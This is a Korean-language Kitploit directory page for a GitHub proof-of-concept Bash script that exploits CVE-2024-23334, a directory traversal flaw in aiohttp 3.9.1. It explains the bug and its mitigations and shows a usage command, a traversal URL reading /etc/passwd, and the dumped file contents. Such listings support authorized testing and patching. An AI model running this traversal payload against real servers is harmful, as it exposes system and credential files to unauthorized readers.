Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
LFI-aiohttp-CVE-2024-23334-PoC — aiohttp 서버 버전 3.9.1에서 로컬 파일 포함(LFI) 공격을 자동화하는 Bash 스크립트입니다. | Kitploit
도구/GitHubGitHub/theredp4nther/lfi-aiohttp-cve-2024-23334-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubtheredp4nther/lfi-aiohttp-cve-2024-23334-poc

LFI-aiohttp-CVE-2024-23334-PoC

aiohttp 서버 버전 3.9.1에서 로컬 파일 포함(LFI) 공격을 자동화하는 Bash 스크립트입니다.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
21년 전아직 검토되지 않음

LFI-aiohttp-CVE-2024-23334-PoC

취약한 aiohttp 서버에 대한 LFI(Local File Inclusion) 공격을 자동화하는 Bash 스크립트로, 특히 CVE-2024-23334를 대상으로 합니다. 이 익스플로잇은 정적 라우트가 잘못 구성된 영향을 받는 aiohttp 버전을 실행하는 시스템에서 임의의 파일에 무단으로 액세스할 수 있게 합니다.

CVE-2024-23334 취약점

CVE-2024-23334 취약점은 Python 및 asyncio용 aiohttp 비동기 HTTP 클라이언트/서버 프레임워크에 영향을 미칩니다. 이 취약점은 aiohttp가 정적 라우트와 함께 웹 서버로 사용될 때 발생하며, 잘못 구성된 경우 디렉토리 트래버설 취약점이 발생할 수 있습니다. 이를 통해 공격자는 권한 없이 시스템의 임의 파일에 액세스할 수 있습니다.

이 취약점에 대한 완화 방법은 다음과 같습니다:

  • 문제가 해결된 aiohttp 3.9.2 이상 버전으로 업그레이드합니다.
  • 서버 구성에서 follow_symlinks 옵션을 비활성화합니다.
  • 리버스 프록시를 사용하여 민감한 파일에 대한 직접 액세스를 차단합니다.

기능

  • 대상 파일에 도달하기 위해 최대 15단계의 디렉토리 트래버설 공격을 자동화합니다.
  • 서버 가용성에 대한 피드백을 제공하고 파일 액세스 성공 여부를 확인합니다.
  • 특정 테스트 환경에 스크립트를 적용할 수 있도록 페이로드 경로를 구성할 수 있습니다.

요구 사항

  • curl: HTTP 요청을 수행하는 데 사용되므로 시스템에 curl이 설치되어 있는지 확인하세요.

사용 방법

스크립트를 실행하려면 다음 명령을 실행하세요:

./lfi_aiohttp.sh -f /path/to/file/to/dump

모든 것이 정상적으로 진행되면 다음과 유사한 결과가 표시됩니다:

root@kitploit:~
[+] Curl output to the resulting url: http://localhost:8080/assets/../../..//etc/passwd.


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
rosa:x:1000:1000:rosa:/home/rosa:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
app:x:1001:1001:,,,:/home/app:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false

[+] File dumped successfully.

구성 참고 사항

중요: 스크립트의 main_url 및 payload 변수는 대상 환경에 따라 조정이 필요할 수 있습니다.

  • main_url: 이 변수는 대상 aiohttp 서버의 URL(예: http://localhost:8080)로 설정해야 합니다. 테스트 중인 실제 서버 주소에 맞게 수정하세요.
  • payload: 이 변수는 서버의 정적 파일 라우트(예: /assets/)를 나타냅니다. 이 경로가 대상 서버의 정적 파일 디렉토리 구성과 일치하는지 확인하세요.

스크립트를 실행하기 전에 이러한 변수를 검토하여 테스트 시나리오에 맞게 올바르게 구성되었는지 확인하세요. 잘못된 설정은 파일 액세스 실패 또는 의도하지 않은 동작을 초래할 수 있습니다.

인자

  • -f: 서버에서 덤프할 파일을 지정합니다.
  • -h: 사용 지침이 포함된 도움말 패널을 표시합니다.

면책 조항

이 스크립트는 교육 목적 및 승인된 침투 테스트 전용입니다. 이 스크립트의 무단 사용은 금지되며 불법일 수 있습니다.

도구 다운로드